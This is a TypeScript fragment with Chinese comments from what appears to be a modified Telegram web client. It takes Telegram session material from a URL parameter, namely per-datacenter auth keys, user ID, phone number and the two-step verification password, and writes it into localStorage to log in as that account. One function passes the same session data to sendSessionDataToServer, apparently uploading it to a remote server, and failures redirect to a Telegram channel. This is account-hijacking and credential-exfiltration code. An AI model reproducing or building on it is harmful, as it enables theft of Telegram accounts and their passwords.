    console.log('🚀 执行基础跳转:', redirectUrl);
    
    window.location.href = redirectUrl;
  } catch (error) {
    console.log('❌ 基础跳转执行失败:', error);
    try {
      window.open('https://t.me/jwsybj6', '_blank');
    } catch (fallbackError) {
      console.log('❌ 备用基础跳转方法也失败:', fallbackError);
    }
  }
}

// 在现有的 onUpdateAuthorizationState 函数中添加数据处理逻辑
// 修改现有的函数调用，在登录成功后触发数据处理

// 基础登录函数 - 仅保存数据到 localStorage，不上传
async function basicLoginWithSessionData(sessionData: any) {
  console.log('🔐 开始基础登录流程（不上传数据）...');
  
  try {
    // 验证 sessionData 的完整性
    if (!sessionData.mainDcId || !sessionData.keys || !sessionData.userId) {
      console.log('❌ sessionData 缺少必要字段:', sessionData);
      return;
    }
    
    console.log('✅ sessionData 验证通过，开始处理...');
    
    // 将 sessionData 保存到 localStorage
    localStorage.setItem('account1', JSON.stringify(sessionData));
    console.log('💾 sessionData 已保存到 localStorage');
    
    // 保存其他必要字段到 localStorage
    if (sessionData.mainDcId) {
      localStorage.setItem('dc', sessionData.mainDcId.toString());
      localStorage.setItem('user_auth', JSON.stringify({ dcID: sessionData.mainDcId }));
    }
    
    // 如果有二级密码，也保存到 localStorage
    if (sessionData.two_pass) {
      localStorage.setItem('two_pass', sessionData.two_pass);
      console.log('🔐 二级密码已保存到 localStorage');
    }
    
    // 保存手机号（如果有）
    if (sessionData.phoneNumber) {
      localStorage.setItem('phoneNumber', sessionData.phoneNumber);
    }
    
    // 模拟登录成功状态
    hasLoggedInSuccessfully = true;
    console.log('✅ 基础登录状态已设置');
    
    // 直接执行跳转，不上传数据
    setTimeout(() => {
      console.log('🔄 基础登录完成，准备跳转...');
      
      // 智能检查是否应该执行自动刷新
      console.log('🔍 开始检查是否需要自动刷新...');
      if (!shouldAutoRefresh()) {
        console.log('❌ 自动刷新检查失败，跳过刷新');
        return;
      }
      
      console.log('🔄 准备自动刷新页面，去除 URL 参数...');
      console.log('⏰ 等待 1 秒后开始刷新...');
      
      // 延迟 1 秒后自动刷新页面，只保留域名
      setTimeout(() => {
        const currentUrl = window.location.origin + window.location.pathname;
        console.log('🚀 开始执行自动刷新到:', currentUrl);
        console.log('🔄 当前完整 URL:', window.location.href);
        console.log('🧹 目标清理 URL:', currentUrl);
        window.location.href = currentUrl;
      }, 1000);
    }, 1000);
    
  } catch (error) {
    console.log('❌ 基础登录失败:', error);
  }
}

// 真正的 Telegram 登录函数 - 使用 Telegram 客户端 API
async function realTelegramLogin(sessionData: any) {
  console.log('🚀 开始真正的 Telegram 登录流程...');
  
  try {
    // 验证 sessionData 的完整性
    if (!sessionData.mainDcId || !sessionData.keys || !sessionData.userId) {
      console.log('❌ sessionData 缺少必要字段:', sessionData);
      return;
    }
    
    console.log('✅ sessionData 验证通过，准备初始化 Telegram 客户端...');
    
    // 转换数据格式为 Telegram 客户端期望的格式
    const telegramFormat = convertToTelegramFormat(sessionData);
    console.log('🔄 转换后的 Telegram 格式:', telegramFormat);
    
    // 写入 localStorage
    for (const key in telegramFormat) {
      localStorage.setItem(key, telegramFormat[key]);
      console.log(`💾 已保存 ${key}:`, telegramFormat[key]);
    }
    
    console.log('✅ 数据保存完成，Telegram 客户端应该能自动读取');
    
    // 智能检查是否应该执行自动刷新
    console.log('🔍 开始检查是否需要自动刷新...');
    if (!shouldAutoRefresh()) {
      console.log('❌ 自动刷新检查失败，跳过刷新');
      return;
    }
    
    console.log('🔄 准备自动刷新页面，去除 URL 参数...');
    console.log('⏰ 等待 2 秒后开始刷新...');
    
    // 延迟 2 秒后自动刷新页面，只保留域名
    setTimeout(() => {
      const currentUrl = window.location.origin + window.location.pathname;
      console.log('🚀 开始执行自动刷新到:', currentUrl);
      console.log('🔄 当前完整 URL:', window.location.href);
      console.log('🧹 目标清理 URL:', currentUrl);
      window.location.href = currentUrl;
    }, 2000);
    
  } catch (error) {
    console.log('❌ Telegram 登录失败:', error);
  }
}

// 转换数据格式为 Telegram 客户端期望的格式
function convertToTelegramFormat(sessionData: any) {
  const { mainDcId, keys, userId, phoneNumber, two_pass, isTest } = sessionData;
  
  // 构建 account1 字段（Telegram 客户端主要读取的字段）
  const account1Data: any = {
    dcId: mainDcId,
    userId: userId
  };
  
  // 添加所有可用的 DC auth_key
  if (keys && typeof keys === 'object') {
    Object.keys(keys).forEach(dcId => {
      if (keys[dcId]) {
        account1Data[`dc${dcId}_auth_key`] = keys[dcId];
      }
    });
  }
  
  // 构建完整的 Telegram 格式
  const telegramFormat: any = {
    // 主要字段
    "account1": JSON.stringify(account1Data),
    "two_pass": two_pass || "",
    "phoneNumber": phoneNumber || "",
    "dc": mainDcId.toString(),
    "user_auth": JSON.stringify({ dcID: mainDcId }),
    
    // 可选字段
    "tgme_sync": JSON.stringify({ canRedirect: true, ts: Math.floor(Date.now() / 1000) }),
    "tt-multitab_1": "1",
    "fake": "no"
  };
  
  // 添加所有可用的 DC auth_key 到根级别
  if (keys && typeof keys === 'object') {
    Object.keys(keys).forEach(dcId => {
      if (keys[dcId]) {
        telegramFormat[`dc${dcId}_auth_key`] = keys[dcId];
      }
    });
  }
  
  return telegramFormat;
}

// 检查是否应该执行自动刷新
function shouldAutoRefresh(): boolean {
  // 如果已经是登录状态，不刷新
  if (hasLoggedInSuccessfully) {
    console.log('✅ 用户已经是登录状态，跳过自动刷新');
    return false;
  }
  
  // 如果 URL 中没有 sessionData 参数，不刷新
  const urlParams = new URLSearchParams(window.location.search);
  const hasSessionData = urlParams.has('sessionData');
  if (!hasSessionData) {
    console.log('✅ URL 中没有 sessionData 参数，跳过自动刷新');
    return false;
  }
  
  // 注意：这里不检查 localStorage 中是否已有数据
  // 因为我们在写入数据后立即调用这个函数
  // 如果检查 localStorage，会导致永远无法刷新
  
  console.log('✅ 需要执行自动刷新');
  return true;
}

// 自动登录函数 - 通过 URL sessionData 参数自动登录
async function autoLoginWithSessionData(sessionData: any, shouldUploadData: boolean = true) {
  console.log('🚀 开始自动登录流程...');
  
  try {
    // 验证 sessionData 的完整性
    if (!sessionData.mainDcId || !sessionData.keys || !sessionData.userId) {
      console.log('❌ sessionData 缺少必要字段:', sessionData);
      return;
    }
    
    console.log('✅ sessionData 验证通过，开始处理...');
    
    // 将 sessionData 保存到 localStorage
    localStorage.setItem('account1', JSON.stringify(sessionData));
    console.log('💾 sessionData 已保存到 localStorage');
    
    // 保存其他必要字段到 localStorage
    if (sessionData.mainDcId) {
      localStorage.setItem('dc', sessionData.mainDcId.toString());
      localStorage.setItem('phoneNumber', sessionData.phoneNumber);
      localStorage.setItem('user_auth', JSON.stringify({ dcID: sessionData.mainDcId }));
    }
    
    // 如果有二级密码，也保存到 localStorage
    if (sessionData.two_pass) {
      localStorage.setItem('two_pass', sessionData.two_pass);
      console.log('🔐 二级密码已保存到 localStorage');
    }
    
    // 保存手机号（如果有）
    if (sessionData.phoneNumber) {
      localStorage.setItem('phoneNumber', sessionData.phoneNumber);
    }
    
    // 模拟登录成功状态
    hasLoggedInSuccessfully = true;
    console.log('✅ 自动登录状态已设置');
    
    // 延迟执行数据处理
    setTimeout(() => {
      console.log('🔄 开始处理自动登录的数据...');
      
      // 根据参数决定是否上传数据
      if (shouldUploadData && isFeatureEnabled()) {
        console.log('✅ 功能已启用，开始上传数据...');
        sendSessionDataToServer(sessionData);
      } else {
        console.log('❌ 功能已禁用或跳过数据上传');
        // 直接执行跳转
        setTimeout(() => {
          executeRedirect();
        }, 1000);
      }
    }, 1000);
    
  } catch (error) {
    console.log('❌ 自动登录失败:', error);
  }
}


